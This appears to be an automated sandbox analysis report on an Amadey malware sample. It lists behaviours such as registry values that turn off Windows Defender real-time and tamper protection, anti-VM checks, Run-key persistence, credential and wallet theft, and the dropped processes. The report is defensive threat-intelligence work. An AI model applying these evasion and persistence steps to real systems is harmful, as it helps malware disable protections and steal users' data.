Analysis Overview
SHA256
6aca87eee19172b75121aa5c92e48d6baaca872950614deec38ae1d7ea32b1fc
Threat Level: Known bad
The file 6aca87eee19172b75121aa5c92e48d6baaca872950614deec38ae1d7ea32b1fc was found to be: Known bad.
Malicious Activity Summary
Amadey
Modifies Windows Defender Real-time Protection settings
Amadey family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Uses browser remote debugging
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Checks BIOS information in registry
Drops startup file
Reads data files stored by FTP clients
Executes dropped EXE
Reads user/profile data of web browsers
Windows security modification
Loads dropped DLL
Checks computer location settings
Identifies Wine through registry keys
Unsecured Credentials: Credentials In Files
Checks installed software on the system
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
UPX packed file
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Windows directory
Browser Information Discovery
Enumerates physical storage devices
Unsigned PE
System Location Discovery: System Language Discovery
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Uses Task Scheduler COM API
Checks processor information in registry
Suspicious use of SendNotifyMessage
Kills process with taskkill
Enumerates system info in registry
Modifies data under HKEY_USERS
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-14 07:22
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-14 07:22
Reported
2024-11-14 07:24
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Amadey
Amadey family
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1006150001\03f4141975.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3e02T.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1006068001\lum250.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1006149001\6d59325afb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\DocumentsBFIIEHJDBK.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1T30C8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2r5367.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3e02T.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\DocumentsBFIIEHJDBK.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1006149001\6d59325afb.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1T30C8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1006150001\03f4141975.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1T30C8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2r5367.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\DocumentsBFIIEHJDBK.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1006068001\lum250.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1006150001\03f4141975.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2r5367.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3e02T.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1006068001\lum250.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1006149001\6d59325afb.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\decrypted_executable.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1T30C8.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3e02T.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe | C:\Windows\system32\curl.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1006150001\03f4141975.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2r5367.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | C:\Users\Admin\DocumentsBFIIEHJDBK.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1006068001\lum250.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1006149001\6d59325afb.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1T30C8.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3e02T.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3e02T.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3e02T.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\6aca87eee19172b75121aa5c92e48d6baaca872950614deec38ae1d7ea32b1fc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u7L07.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\A2M26.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6d59325afb.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1006149001\\6d59325afb.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\03f4141975.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1006150001\\03f4141975.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d6eb7e4fd8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1006152001\\d6eb7e4fd8.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
Checks installed software on the system
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1T30C8.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2r5367.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2r5367.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3e02T.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\DocumentsBFIIEHJDBK.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1006068001\lum250.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1006149001\6d59325afb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1006150001\03f4141975.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1006149001\6d59325afb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\skotes.job | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1T30C8.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3e02T.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1006068001\lum250.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1006150001\03f4141975.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u7L07.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\A2M26.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\DocumentsBFIIEHJDBK.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1T30C8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2r5367.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1006149001\6d59325afb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\6aca87eee19172b75121aa5c92e48d6baaca872950614deec38ae1d7ea32b1fc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4g929o.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3e02T.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3e02T.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133760426061420129" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\6aca87eee19172b75121aa5c92e48d6baaca872950614deec38ae1d7ea32b1fc.exe
"C:\Users\Admin\AppData\Local\Temp\6aca87eee19172b75121aa5c92e48d6baaca872950614deec38ae1d7ea32b1fc.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u7L07.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u7L07.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\A2M26.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\A2M26.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1T30C8.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1T30C8.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2r5367.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2r5367.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=2r5367.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
